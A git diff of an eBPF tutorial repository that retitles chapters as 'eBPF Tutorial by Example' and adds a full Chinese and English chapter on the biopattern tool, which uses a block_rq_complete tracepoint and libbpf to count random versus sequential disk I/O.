diff --git a/src/0-introduce/README_en.md b/src/0-introduce/README_en.md index 8dc2303..229e00e 100644 --- a/src/0-introduce/README_en.md +++ b/src/0-introduce/README_en.md @@ -1,6 +1,6 @@ -# eBPF Beginner's Development Tutorial 0: Introduction to the Basic Concepts of eBPF and Common Development Tools +# eBPF Tutorial by Example 0: Introduction to Core Concepts and Tools -## 1. Introduction to eBPF: Secure and Efficient Kernel Extension +## Introduction to eBPF: Secure and Efficient Kernel Extension eBPF is a revolutionary technology that originated in the Linux kernel and allows sandbox programs to run in the kernel of an operating system. It is used to securely and efficiently extend the functionality of the kernel without the need to modify the kernel's source code or load kernel modules. By allowing the execution of sandbox programs in the operating system, eBPF enables application developers to dynamically add additional functionality to the operating system at runtime. The operating system then ensures security and execution efficiency, similar to performing native compilation with the help of a Just-In-Time (JIT) compiler and verification engine. eBPF programs are portable between kernel versions and can be automatically updated, avoiding workload interruptions and node restarts. diff --git a/src/1-helloworld/README.md b/src/1-helloworld/README.md index 7334e06..c40f7cf 100644 --- a/src/1-helloworld/README.md +++ b/src/1-helloworld/README.md @@ -190,4 +190,4 @@ eBPF 程序的开发和使用流程可以概括为如下几个步骤: 需要注意的是,BPF 程序的执行是在内核空间进行的,因此需要使用特殊的工具和技术来编写、编译和调试 BPF 程序。eunomia-bpf 是一个开源的 BPF 编译器和工具包,它可以帮助开发者快速和简单地编写和运行 BPF 程序。 -您还可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程,全部内容均已开源。我们会继续分享更多有关 eBPF 开发实践的内容,帮助您更好地理解和掌握 eBPF 技术。 +您还可以访问我们的教程代码仓库 以获取更多示例和完整的教程,全部内容均已开源。我们会继续分享更多有关 eBPF 开发实践的内容,帮助您更好地理解和掌握 eBPF 技术。 diff --git a/src/1-helloworld/README_en.md b/src/1-helloworld/README_en.md index 2035e62..e456000 100644 --- a/src/1-helloworld/README_en.md +++ b/src/1-helloworld/README_en.md @@ -1,8 +1,8 @@ -# eBPF Getting Started Tutorial 1 Hello World, Basic Framework and Development Process +# eBPF Tutorial by Example 1 Hello World, Basic Framework and Development Process In this blog post, we will delve into the basic framework and development process of eBPF (Extended Berkeley Packet Filter). eBPF is a powerful network and performance analysis tool that runs on the Linux kernel, providing developers with the ability to dynamically load, update, and run user-defined code at kernel runtime. This enables developers to implement efficient, secure kernel-level network monitoring, performance analysis, and troubleshooting functionalities. -This article is the second part of the eBPF Getting Started Tutorial, where we will focus on how to write a simple eBPF program and demonstrate the entire development process through practical examples. Before reading this tutorial, it is recommended that you first learn the concepts of eBPF by studying the first tutorial. +This article is the second part of the eBPF Tutorial by Example, where we will focus on how to write a simple eBPF program and demonstrate the entire development process through practical examples. Before reading this tutorial, it is recommended that you first learn the concepts of eBPF by studying the first tutorial. When developing eBPF programs, there are multiple development frameworks to choose from, such as BCC (BPF Compiler Collection) libbpf, cilium/ebpf, eunomia-bpf, etc. Although these tools have different characteristics, their basic development process is similar. In the following content, we will delve into these processes and use the Hello World program as an example to guide readers in mastering the basic skills of eBPF development. diff --git a/src/10-hardirqs/README_en.md b/src/10-hardirqs/README_en.md index e33c216..dd62997 100644 --- a/src/10-hardirqs/README_en.md +++ b/src/10-hardirqs/README_en.md @@ -1,8 +1,8 @@ -# eBPF Beginner's Development Tutorial Ten: Capturing Interrupt Events in eBPF Using hardirqs or softirqs +# eBPF Tutorial by Example 10: Capturing Interrupt Events Using hardirqs or softirqs eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel. It allows developers to dynamically load, update, and run user-defined code at runtime in the kernel. -This article is the tenth part of the eBPF Beginner's Development Tutorial, focusing on capturing interrupt events using hardirqs or softirqs in eBPF. +This article is the tenth part of the eBPF Tutorial by Example, focusing on capturing interrupt events using hardirqs or softirqs in eBPF. hardirqs and softirqs are two different types of interrupt handlers in the Linux kernel. They are used to handle interrupt requests generated by hardware devices, as well as asynchronous events in the kernel. In eBPF, we can use the eBPF tools hardirqs and softirqs to capture and analyze information related to interrupt handling in the kernel. ## What are hardirqs and softirqs? @@ -234,7 +234,7 @@ This code is an eBPF program used to capture and analyze the execution informati The code for Softirq is similar, and I won't elaborate on it here. -## Run code.Translated content: +## Run code.Translated content "eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain that combines Wasm. Its purpose is to simplify the development, building, distribution, and execution of eBPF programs. You can refer to to download and install the ecc compilation toolchain and ecli runtime. We use eunomia-bpf to compile and run this example. @@ -254,8 +254,8 @@ sudo ecli run ./package.json ## Summary -In this chapter (eBPF Getting Started Tutorial Ten: Capturing Interrupt Events in eBPF with Hardirqs or Softirqs), we learned how to capture and analyze the execution information of hardware interrupt handlers (hardirqs) in the kernel using eBPF programs. We explained the example code in detail, including how to define data structures, mappings, eBPF program entry points, and how to call helper functions to record execution information at the entry and exit points of interrupt handlers. +In this chapter (eBPF Tutorial by Example Ten: Capturing Interrupt Events in eBPF with Hardirqs or Softirqs), we learned how to capture and analyze the execution information of hardware interrupt handlers (hardirqs) in the kernel using eBPF programs. We explained the example code in detail, including how to define data structures, mappings, eBPF program entry points, and how to call helper functions to record execution information at the entry and exit points of interrupt handlers. By studying the content of this chapter, you should have mastered the methods of capturing interrupt events with hardirqs or softirqs in eBPF, as well as how to analyze these events to identify performance issues and other problems related to interrupt handling in the kernel. These skills are crucial for analyzing and optimizing the performance of the Linux kernel. -To better understand and practice eBPF programming, we recommend reading the official documentation of eunomia-bpf: . In addition, we provide a complete tutorial and source code for you to view and learn from at . We hope this tutorial can help you get started with eBPF development smoothly and provide useful references for your further learning and practice." \ No newline at end of file +To better understand and practice eBPF programming, we recommend reading the official documentation of eunomia-bpf: . In addition, we provide a complete tutorial and source code for you to view and learn from at . diff --git a/src/11-bootstrap/README_en.md b/src/11-bootstrap/README_en.md index c3b7890..50139ad 100644 --- a/src/11-bootstrap/README_en.md +++ b/src/11-bootstrap/README_en.md @@ -1,4 +1,4 @@ -# eBPF Beginner's Development Practice Tutorial 11: Using libbpf to Develop User-Space Programs in eBPF and Trace exec() and exit() System Calls +# eBPF Tutorial by Example 11: Using libbpf to Develop User-Space Programs in eBPF and Trace exec() and exit() System Calls eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel. It allows developers to dynamically load, update, and run user-defined code during kernel runtime. diff --git a/src/12-profile/README_en.md b/src/12-profile/README_en.md index 74b439f..f96fc50 100644 --- a/src/12-profile/README_en.md +++ b/src/12-profile/README_en.md @@ -1,4 +1,4 @@ -# eBPF Beginner's Practical Tutorial 12: Using eBPF Program Profile for Performance Analysis +# eBPF Tutorial by Example 12: Using eBPF Program Profile for Performance Analysis This tutorial will guide you on using libbpf and eBPF programs for performance analysis. We will leverage the perf mechanism in the kernel to learn how to capture the execution time of functions and view performance data. diff --git a/src/13-tcpconnlat/README_en.md b/src/13-tcpconnlat/README_en.md index 9b42587..92999b4 100644 --- a/src/13-tcpconnlat/README_en.md +++ b/src/13-tcpconnlat/README_en.md @@ -1,8 +1,8 @@ -# eBPF Beginner's Development Practice Tutorial 13: Statistics of TCP Connection Delay and Data Processing in User Space Using libbpf +# eBPF Tutorial by Example 13: Statistics of TCP Connection Delay and Data Processing in User Space Using libbpf eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool used in the Linux kernel. eBPF allows developers to dynamically load, update, and run user-defined code without restarting the kernel or changing the kernel source code. -This article is the thirteenth installment of the eBPF beginner's development practice tutorial, mainly about how to use eBPF to statistics TCP connection delay and process data in user space using libbpf. +This article is the thirteenth installment of the eBPF Tutorial by Example, mainly about how to use eBPF to statistics TCP connection delay and process data in user space using libbpf. ## Background diff --git a/src/14-tcpstates/README_en.md b/src/14-tcpstates/README_en.md index 68ce2f9..12346b0 100644 --- a/src/14-tcpstates/README_en.md +++ b/src/14-tcpstates/README_en.md @@ -1,8 +1,8 @@ -# eBPF Introductory Practice Tutorial 14: Recording TCP Connection Status and TCP RTT +# eBPF Tutorial by Example 14: Recording TCP Connection Status and TCP RTT eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool widely used in the Linux kernel. eBPF allows developers to dynamically load, update, and run user-defined code without restarting the kernel or changing the kernel source code. -In this article of our eBPF introductory practice tutorial series, we will introduce two sample programs: `tcpstates` and `tcprtt`. `tcpstates` is used to record the state changes of TCP connections, while `tcprtt` is used to record the Round-Trip Time (RTT) of TCP. +In this article of our eBPF Tutorial by Example series, we will introduce two sample programs: `tcpstates` and `tcprtt`. `tcpstates` is used to record the state changes of TCP connections, while `tcprtt` is used to record the Round-Trip Time (RTT) of TCP. ## `tcprtt` and `tcpstates` diff --git a/src/15-javagc/README_en.md b/src/15-javagc/README_en.md index 7d84a3e..742e974 100644 --- a/src/15-javagc/README_en.md +++ b/src/15-javagc/README_en.md @@ -1,8 +1,8 @@ -# eBPF Introduction Tutorial 15: Capturing User-Space Java GC Event Duration Using USDT +# eBPF Tutorial by Example 15: Capturing User-Space Java GC Event Duration Using USDT eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool widely used in the Linux kernel. eBPF allows developers to dynamically load, update, and run user-defined code without the need to restart the kernel or modify the kernel source code. This feature provides eBPF with high flexibility and performance, making it widely applicable in network and system performance analysis. Furthermore, eBPF also supports capturing user-space application behavior using User-Level Statically Defined Tracing (USDT). -In this article of our eBPF introduction tutorial series, we will explore how to use eBPF and USDT to capture and analyze the duration of Java garbage collection (GC) events. +In this article of our eBPF Tutorial by Example series, we will explore how to use eBPF and USDT to capture and analyze the duration of Java garbage collection (GC) events. ## Introduction to USDT @@ -98,10 +98,9 @@ struct { } data_map SEC(".maps"); struct { - __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY); -``````cpp -__type(key, int); -__type(value, int); + __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY) + __type(key, int); + __type(value, int); } perf_map SEC(".maps"); __u32 time; diff --git a/src/16-memleak/README_en.md b/src/16-memleak/README_en.md index a69a320..c953784 100644 --- a/src/16-memleak/README_en.md +++ b/src/16-memleak/README_en.md @@ -1,4 +1,4 @@ -# eBPF Getting Started Tutorial 16: Writing eBPF Program Memleak for Monitoring Memory Leaks +# eBPF Tutorial by Example 16: Memleak for Monitoring Memory Leaks eBPF (extended Berkeley Packet Filter) is a powerful network and performance analysis tool that is widely used in the Linux kernel. eBPF allows developers to dynamically load, update, and run user-defined code without restarting the kernel or modifying its source code. diff --git a/src/17-biopattern/README.md b/src/17-biopattern/README.md index ed834c8..0fb5845 100644 --- a/src/17-biopattern/README.md +++ b/src/17-biopattern/README.md @@ -1,23 +1,329 @@ -# eBPF 入门实践教程:编写 eBPF 程序 Biopattern: 统计随机/顺序磁盘 I/O +# eBPF 入门实践教程十七:编写 eBPF 程序统计随机/顺序磁盘 I/O -## 背景 +eBPF(扩展的伯克利数据包过滤器)是 Linux 内核中的一种新技术,允许用户在内核空间中执行自定义程序,而无需更改内核代码。这为系统管理员和开发者提供了强大的工具,可以深入了解和监控系统的行为,从而进行优化。 + +在本篇教程中,我们将探索如何使用 eBPF 编写程序来统计随机和顺序的磁盘 I/O。磁盘 I/O 是计算机性能的关键指标之一,特别是在数据密集型应用中。 + +## 随机/顺序磁盘 I/O + +随着技术的进步和数据量的爆炸性增长,磁盘 I/O 成为了系统性能的关键瓶颈。应用程序的性能很大程度上取决于其如何与存储层进行交互。因此,深入了解和优化磁盘 I/O,特别是随机和顺序的 I/O,变得尤为重要。 + +1. **随机 I/O**:随机 I/O 发生在应用程序从磁盘的非连续位置读取或写入数据时。这种 I/O 模式的主要特点是磁盘头需要频繁地在不同的位置之间移动,导致其通常比顺序 I/O 的速度慢。典型的产生随机 I/O 的场景包括数据库查询、文件系统的元数据操作以及虚拟化环境中的并发任务。 + +2. **顺序 I/O**:与随机 I/O 相反,顺序 I/O 是当应用程序连续地读取或写入磁盘上的数据块。这种 I/O 模式的优势在于磁盘头可以在一个方向上连续移动,从而大大提高了数据的读写速度。视频播放、大型文件的下载或上传以及连续的日志记录都是产生顺序 I/O 的典型应用。 + +为了实现存储性能的最优化,了解随机和顺序的磁盘 I/O 是至关重要的。例如,随机 I/O 敏感的应用程序在 SSD 上的性能通常远超于传统硬盘,因为 SSD 在处理随机 I/O 时几乎没有寻址延迟。相反,对于大量顺序 I/O 的应用,如何最大化磁盘的连续读写速度则更为关键。 + +在本教程的后续部分,我们将详细探讨如何使用 eBPF 工具来实时监控和统计这两种类型的磁盘 I/O。这不仅可以帮助我们更好地理解系统的 I/O 行为,还可以为进一步的性能优化提供有力的数据支持。 + +## Biopattern Biopattern 可以统计随机/顺序磁盘I/O次数的比例。 -TODO +首先,确保你已经正确安装了 libbpf 和相关的工具集,可以在这里找到对应的源代码:[bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) -## 实现原理 +导航到 `biopattern` 的源代码目录,并使用 `make` 命令进行编译: -Biopattern 的ebpf代码在 tracepoint/block/block_rq_complete 挂载点下实现。在磁盘完成IO请求 -后,程序会经过此挂载点。Biopattern 内部存有一张以设备号为主键的哈希表,当程序经过挂载点时, Biopattern -会获得操作信息,根据哈希表中该设备的上一次操作记录来判断本次操作是随机IO还是顺序IO,并更新操作计数。 +```bash +cd ~/bpf-developer-tutorial/src/17-biopattern +make +``` -## 编写 eBPF 程序 +编译成功后,你应该可以在当前目录下看到 `biopattern` 的可执行文件。基本的运行命令如下: -TODO +```bash +sudo ./biopattern [interval] [count] +``` -### 总结 +例如,要每秒打印一次输出,并持续10秒,你可以运行: -Biopattern 可以展现随机/顺序磁盘I/O次数的比例,对于开发者把握整体I/O情况有较大帮助。 +```console +$ sudo ./biopattern 1 10 +Tracing block device I/O requested seeks... Hit Ctrl-C to end. +DISK %RND %SEQ COUNT KBYTES +sr0 0 100 3 0 +sr1 0 100 8 0 +sda 0 100 1 4 +sda 100 0 26 136 +sda 0 100 1 4 +``` -TODO +输出列的含义如下: + +- `DISK`:被追踪的磁盘名称。 +- `%RND`:随机 I/O 的百分比。 +- `%SEQ`:顺序 I/O 的百分比。 +- `COUNT`:在指定的时间间隔内的 I/O 请求次数。 +- `KBYTES`:在指定的时间间隔内读写的数据量(以 KB 为单位)。 + +从上述输出中,我们可以得出以下结论: + +- `sr0` 和 `sr1` 设备在观测期间主要进行了顺序 I/O,但数据量很小。 +- `sda` 设备在某些时间段内只进行了随机 I/O,而在其他时间段内只进行了顺序 I/O。 + +这些信息可以帮助我们了解系统的 I/O 模式,从而进行针对性的优化。 + +## eBPF Biopattern 实现原理 + +首先,让我们看一下 biopattern 的核心 eBPF 内核态代码: + +```c +#include +#include +#include +#include "biopattern.h" +#include "maps.bpf.h" +#include "core_fixes.bpf.h" + +const volatile bool filter_dev = false; +const volatile __u32 targ_dev = 0; + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 64); + __type(key, u32); + __type(value, struct counter); +} counters SEC(".maps"); + +SEC("tracepoint/block/block_rq_complete") +int handle__block_rq_complete(void *args) +{ + struct counter *counterp, zero = {}; + sector_t sector; + u32 nr_sector; + u32 dev; + + if (has_block_rq_completion()) { + struct trace_event_raw_block_rq_completion___x *ctx = args; + sector = BPF_CORE_READ(ctx, sector); + nr_sector = BPF_CORE_READ(ctx, nr_sector); + dev = BPF_CORE_READ(ctx, dev); + } else { + struct trace_event_raw_block_rq_complete___x *ctx = args; + sector = BPF_CORE_READ(ctx, sector); + nr_sector = BPF_CORE_READ(ctx, nr_sector); + dev = BPF_CORE_READ(ctx, dev); + } + + if (filter_dev && targ_dev != dev) + return 0; + + counterp = bpf_map_lookup_or_try_init(&counters, &dev, &zero); + if (!counterp) + return 0; + if (counterp->last_sector) { + if (counterp->last_sector == sector) + __sync_fetch_and_add(&counterp->sequential, 1); + else + __sync_fetch_and_add(&counterp->random, 1); + __sync_fetch_and_add(&counterp->bytes, nr_sector * 512); + } + counterp->last_sector = sector + nr_sector; + return 0; +} + +char LICENSE[] SEC("license") = "GPL"; +``` + +1. 全局变量定义 + +```c + const volatile bool filter_dev = false; + const volatile __u32 targ_dev = 0; +``` + +这两个全局变量用于设备过滤。`filter_dev` 决定是否启用设备过滤,而 `targ_dev` 是我们想要追踪的目标设备的标识符。 + +BPF map 定义: + +```c + struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 64); + __type(key, u32); + __type(value, struct counter); + } counters SEC(".maps"); +``` + +这部分代码定义了一个 BPF map,类型为哈希表。该映射的键是设备的标识符,而值是一个 `counter` 结构体,用于存储设备的 I/O 统计信息。 + +追踪点函数: + +```c + SEC("tracepoint/block/block_rq_complete") + int handle__block_rq_complete(void *args) + { + struct counter *counterp, zero = {}; + sector_t sector; + u32 nr_sector; + u32 dev; + + if (has_block_rq_completion()) { + struct trace_event_raw_block_rq_completion___x *ctx = args; + sector = BPF_CORE_READ(ctx, sector); + nr_sector = BPF_CORE_READ(ctx, nr_sector); + dev = BPF_CORE_READ(ctx, dev); + } else { + struct trace_event_raw_block_rq_complete___x *ctx = args; + sector = BPF_CORE_READ(ctx, sector); + nr_sector = BPF_CORE_READ(ctx, nr_sector); + dev = BPF_CORE_READ(ctx, dev); + } + + if (filter_dev && targ_dev != dev) + return 0; + + counterp = bpf_map_lookup_or_try_init(&counters, &dev, &zero); + if (!counterp) + return 0; + if (counterp->last_sector) { + if (counterp->last_sector == sector) + __sync_fetch_and_add(&counterp->sequential, 1); + else + __sync_fetch_and_add(&counterp->random, 1); + __sync_fetch_and_add(&counterp->bytes, nr_sector * 512); + } + counterp->last_sector = sector + nr_sector; + return 0; + } +``` + +在 Linux 中,每次块设备的 I/O 请求完成时,都会触发一个名为 `block_rq_complete` 的追踪点。这为我们提供了一个机会,通过 eBPF 来捕获这些事件,并进一步分析 I/O 的模式。 + +主要逻辑分析: + +- **提取 I/O 请求信息**:从传入的参数中获取 I/O 请求的相关信息。这里有两种可能的上下文结构,取决于 `has_block_rq_completion` 的返回值。这是因为不同版本的 Linux 内核可能会有不同的追踪点定义。无论哪种情况,我们都从上下文中提取出扇区号 (`sector`)、扇区数量 (`nr_sector`) 和设备标识符 (`dev`)。 +- **设备过滤**:如果启用了设备过滤 (`filter_dev` 为 `true`),并且当前设备不是目标设备 (`targ_dev`),则直接返回。这允许用户只追踪特定的设备,而不是所有设备。 +- **统计信息更新**: + - **查找或初始化统计信息**:使用 `bpf_map_lookup_or_try_init` 函数查找或初始化与当前设备相关的统计信息。如果映射中没有当前设备的统计信息,它会使用 `zero` 结构体进行初始化。 + - **判断 I/O 模式**:根据当前 I/O 请求与上一个 I/O 请求的扇区号,我们可以判断当前请求是随机的还是顺序的。如果两次请求的扇区号相同,那么它是顺序的;否则,它是随机的。然后,我们使用 `__sync_fetch_and_add` 函数更新相应的统计信息。这是一个原子操作,确保在并发环境中数据的一致性。 + - **更新数据量**:我们还更新了该设备的总数据量,这是通过将扇区数量 (`nr_sector`) 乘以 512(每个扇区的字节数)来实现的。 + - **更新最后一个 I/O 请求的扇区号**:为了下一次的比较,我们更新了 `last_sector` 的值。 + +在 Linux 内核的某些版本中,由于引入了一个新的追踪点 `block_rq_error`,追踪点的命名和结构发生了变化。这意味着,原先的 `block_rq_complete` 追踪点的结构名称从 `trace_event_raw_block_rq_complete` 更改为 `trace_event_raw_block_rq_completion`。这种变化可能会导致 eBPF 程序在不同版本的内核上出现兼容性问题。 + +为了解决这个问题,`biopattern` 工具引入了一种机制来动态检测当前内核使用的是哪种追踪点结构,即 `has_block_rq_completion` 函数。 + +1. **定义两种追踪点结构**: + +```c + struct trace_event_raw_block_rq_complete___x { + dev_t dev; + sector_t sector; + unsigned int nr_sector; + } __attribute__((preserve_access_index)); + + struct trace_event_raw_block_rq_completion___x { + dev_t dev; + sector_t sector; + unsigned int nr_sector; + } __attribute__((preserve_access_index)); +``` + +这里定义了两种追踪点结构,分别对应于不同版本的内核。每种结构都包含设备标识符 (`dev`)、扇区号 (`sector`) 和扇区数量 (`nr_sector`)。 + +**动态检测追踪点结构**: + +```c + static __always_inline bool has_block_rq_completion() + { + if (bpf_core_type_exists(struct trace_event_raw_block_rq_completion___x)) + return true; + return false; + } +``` + +`has_block_rq_completion` 函数使用 `bpf_core_type_exists` 函数来检测当前内核是否存在 `trace_event_raw_block_rq_completion___x` 结构。如果存在,函数返回 `true`,表示当前内核使用的是新的追踪点结构;否则,返回 `false`,表示使用的是旧的结构。在对应的 eBPF 代码中,会根据两种不同的定义分别进行处理,这也是适配不同内核版本之间的变更常见的方案。 + +### 用户态代码 + +`biopattern` 工具的用户态代码负责从 BPF 映射中读取统计数据,并将其展示给用户。通过这种方式,系统管理员可以实时监控每个设备的 I/O 模式,从而更好地理解和优化系统的 I/O 性能。 + +主循环: + +```c + /* main: poll */ + while (1) { + sleep(env.interval); + + err = print_map(obj->maps.counters, partitions); + if (err) + break; + + if (exiting || --env.times == 0) + break; + } +``` + +这是 `biopattern` 工具的主循环,它的工作流程如下: + +- **等待**:使用 `sleep` 函数等待指定的时间间隔 (`env.interval`)。 +- **打印映射**:调用 `print_map` 函数打印 BPF 映射中的统计数据。 +- **退出条件**:如果收到退出信号 (`exiting` 为 `true`) 或者达到指定的运行次数 (`env.times` 达到 0),则退出循环。 + +打印映射函数: + +```c + static int print_map(struct bpf_map *counters, struct partitions *partitions) + { + __u32 total, lookup_key = -1, next_key; + int err, fd = bpf_map__fd(counters); + const struct partition *partition; + struct counter counter; + struct tm *tm; + char ts[32]; + time_t t; + + while (!bpf_map_get_next_key(fd, &lookup_key, &next_key)) { + err = bpf_map_lookup_elem(fd, &next_key, &counter); + if (err < 0) { + fprintf(stderr, "failed to lookup counters: %d\n", err); + return -1; + } + lookup_key = next_key; + total = counter.sequential + counter.random; + if (!total) + continue; + if (env.timestamp) { + time(&t); + tm = localtime(&t); + strftime(ts, sizeof(ts), "%H:%M:%S", tm); + printf("%-9s ", ts); + } + partition = partitions__get_by_dev(partitions, next_key); + printf("%-7s %5ld %5ld %8d %10lld\n", + partition ? partition->name : "Unknown", + counter.random * 100L / total, + counter.sequential * 100L / total, total, + counter.bytes / 1024); + } + + lookup_key = -1; + while (!bpf_map_get_next_key(fd, &lookup_key, &next_key)) { + err = bpf_map_delete_elem(fd, &next_key); + if (err < 0) { + fprintf(stderr, "failed to cleanup counters: %d\n", err); + return -1; + } + lookup_key = next_key; + } + + return 0; + } +``` + +`print_map` 函数负责从 BPF 映射中读取统计数据,并将其打印到控制台。其主要逻辑如下: + +- **遍历 BPF 映射**:使用 `bpf_map_get_next_key` 和 `bpf_map_lookup_elem` 函数遍历 BPF 映射,获取每个设备的统计数据。 +- **计算总数**:计算每个设备的随机和顺序 I/O 的总数。 +- **打印统计数据**:如果启用了时间戳 (`env.timestamp` 为 `true`),则首先打印当前时间。接着,打印设备名称、随机 I/O 的百分比、顺序 I/O 的百分比、总 I/O 数量和总数据量(以 KB 为单位)。 +- **清理 BPF 映射**:为了下一次的统计,使用 `bpf_map_get_next_key` 和 `bpf_map_delete_elem` 函数清理 BPF 映射中的所有条目。 + +## 总结 + +在本教程中,我们深入探讨了如何使用 eBPF 工具 biopattern 来实时监控和统计随机和顺序的磁盘 I/O。我们首先了解了随机和顺序磁盘 I/O 的重要性,以及它们对系统性能的影响。接着,我们详细介绍了 biopattern 的工作原理,包括如何定义和使用 BPF maps,如何处理不同版本的 Linux 内核中的追踪点变化,以及如何在 eBPF 程序中捕获和分析磁盘 I/O 事件。 + +您可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 + +- 完整代码: +- bcc 工具: diff --git a/src/17-biopattern/README_en.md b/src/17-biopattern/README_en.md index e384494..532786b 100644 --- a/src/17-biopattern/README_en.md +++ b/src/17-biopattern/README_en.md @@ -1,21 +1,330 @@ -# eBPF Getting Started Tutorial: Writing eBPF Program Biopattern: Statistical Random/Sequential Disk I/O +# eBPF Getting Started Hands-On Tutorial 17: Count Random/Sequential Disk I/O -## Background +eBPF (Extended Berkeley Packet Filter) is a new technology in the Linux kernel that allows users to execute custom programmes in kernel space without changing the kernel code. This provides system administrators and developers with powerful tools to gain insight into and monitor system behaviour for optimisation. -Biopattern can statistically count the ratio of random/sequential disk I/O. +In this tutorial, we will explore how to use eBPF to write programs to count random and sequential disk I/O. Disk I/O is one of the key metrics of computer performance, especially in data-intensive applications. -TODO +## Random/Sequential Disk I/O -## Implementation Principle +As technology advances and data volumes explode, disk I/O becomes a critical bottleneck in system performance. The performance of an application depends heavily on how it interacts with the storage tier. Therefore, it becomes especially important to deeply understand and optimise disk I/O, especially random and sequential I/O. -The ebpf code of Biopattern is implemented under the mount point tracepoint/block/block_rq_complete. After the disk completes an IO request, the program will pass through this mount point. Biopattern has an internal hash table with device number as the primary key. When the program passes through the mount point, Biopattern obtains the operation information and determines whether the current operation is random or sequential IO based on the previous operation record of the device in the hash table, and updates the operation count. +1. **Random I/O**: Random I/O occurs when an application reads or writes data from or to a non-sequential location on the disk. The main characteristic of this I/O mode is that the disk head needs to move frequently between locations, causing it to be typically slower than sequential I/O. Typical scenarios that generate random I/O include database queries, file system metadata operations, and concurrent tasks in virtualised environments. -## Writing eBPF Program +2. **Sequential I/O**: In contrast to random I/O, sequential I/O occurs when an application continuously reads or writes blocks of data to or from disk. The advantage of this I/O mode is that the disk head can move continuously in one direction, which greatly increases the speed at which data can be read and written. Video playback, downloading or uploading large files, and continuous logging are typical applications that generate sequential I/O. -TODO +To optimise storage performance, it is critical to understand both random and sequential disk I/O. For example, random I/O-sensitive applications typically perform far better on SSDs than on traditional hard drives because SSDs have virtually no addressing latency when dealing with random I/Os. Conversely, for applications with a lot of sequential I/O, it is much more critical to maximize the sequential read and write speed of the disk. -### Summary +In the rest of this tutorial, we will discuss in detail how to use the eBPF tool to monitor and count both types of disk I/O in real time, which will not only help us better understand the I/O behaviour of the system, but will also provide us with strong data for further performance optimization. -Biopattern can show the ratio of random/sequential disk I/O, which is very helpful for developers to grasp the overall I/O situation. +## Biopattern -TODO \ No newline at end of file +Biopattern counts the percentage of random/sequential disk I/Os. + +First of all, make sure that you have installed libbpf and the associated toolset correctly, you can find the source code here: [bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) + +Navigate to the `biopattern` source directory and compile it using the `make` command: + +```bash +cd ~/bpf-developer-tutorial/src/17-biopattern +make +``` + +After successful compilation, you should see the `biopattern` executable in the current directory. The basic runtime commands are as follows: + +```bash +sudo ./biopattern [interval] [count] +``` + +For example, to print the output once per second for 10 seconds, you can run: + +```console +$ sudo ./biopattern 1 10 +Tracing block device I/O requested seeks... Hit Ctrl-C to end. +DISK %RND %SEQ COUNT KBYTES +sr0 0 100 3 0 +sr1 0 100 8 0 +sda 0 100 1 4 +sda 100 0 26 136 +sda 0 100 1 4 +``` + +The output columns have the following meanings: + +- `DISK`: Name of the disk being tracked. +- `%RND`: Percentage of random I/O. +- `%SEQ`: percentage of sequential I/O. +- `COUNT`: Number of I/O requests in the specified interval. +- `KBYTES`: amount of data (in KB) read and written in the specified time interval. + +From the above output, we can draw the following conclusions: + +- The `sr0` and `sr1` devices performed mostly sequential I/O during the observation period, but the amount of data was small. +- The `sda` device performed only random I/O during some time periods and only sequential I/O during other time periods. + +This information can help us understand the I/O pattern of the system so that we can target optimisation. + +## eBPF Biopattern Implementation Principles + +First, let's look at the eBPF kernel state code at the heart of biopattern: + +```c +#include +#include +#include +#include "biopattern.h" +#include "maps.bpf.h" +#include "core_fixes.bpf.h" + +const volatile bool filter_dev = false; +const volatile __u32 targ_dev = 0; + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 64); + __type(key, u32); + __type(value, struct counter); +} counters SEC(".maps"); + +SEC("tracepoint/block/block_rq_complete") +int handle__block_rq_complete(void *args) +{ + struct counter *counterp, zero = {}; + sector_t sector; + u32 nr_sector; + u32 dev; + + if (has_block_rq_completion()) { + struct trace_event_raw_block_rq_completion___x *ctx = args; + sector = BPF_CORE_READ(ctx, sector); + nr_sector = BPF_CORE_READ(ctx, nr_sector); + dev = BPF_CORE_READ(ctx, dev); + } else { + struct trace_event_raw_block_rq_complete___x *ctx = args; + sector = BPF_CORE_READ(ctx, sector); + nr_sector = BPF_CORE_READ(ctx, nr_sector); + dev = BPF_CORE_READ(ctx, dev); + } + + if (filter_dev && targ_dev != dev) + return 0; + + counterp = bpf_map_lookup_or_try_init(&counters, &dev, &zero); + if (!counterp) + return 0; + if (counterp->last_sector) { + if (counterp->last_sector == sector) + __sync_fetch_and_add(&counterp->sequential, 1); + else + __sync_fetch_and_add(&counterp->random, 1); + __sync_fetch_and_add(&counterp->bytes, nr_sector * 512); + } + counterp->last_sector = sector + nr_sector; + return 0; +} + +char LICENSE[] SEC("license") = "GPL"; +``` + +1. Global variable definitions + +```c + const volatile bool filter_dev = false; + const volatile __u32 targ_dev = 0; +``` + +These two global variables are used for device filtering. `filter_dev` determines whether device filtering is enabled or not, and `targ_dev` is the identifier of the target device we want to track. + +2. BPF map definition + +```c + struct { __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 64); __type(key, u32); + __type(value, struct counter); + } counters SEC(".maps"). +``` + +This part of the code defines a BPF map of type hash table. The key of the map is the identifier of the device, and the value is a `counter` struct, which is used to store the I/O statistics of the device. + +3. The tracepoint function + +```c + SEC("tracepoint/block/block_rq_complete") + int handle__block_rq_complete(void *args) + { + struct counter *counterp, zero = {}; + sector_t sector; + u32 nr_sector; + u32 dev; + + if (has_block_rq_completion()) { + struct trace_event_raw_block_rq_completion___x *ctx = args; + sector = BPF_CORE_READ(ctx, sector); + nr_sector = BPF_CORE_READ(ctx, nr_sector); + dev = BPF_CORE_READ(ctx, dev); + } else { + struct trace_event_raw_block_rq_complete___x *ctx = args; + sector = BPF_CORE_READ(ctx, 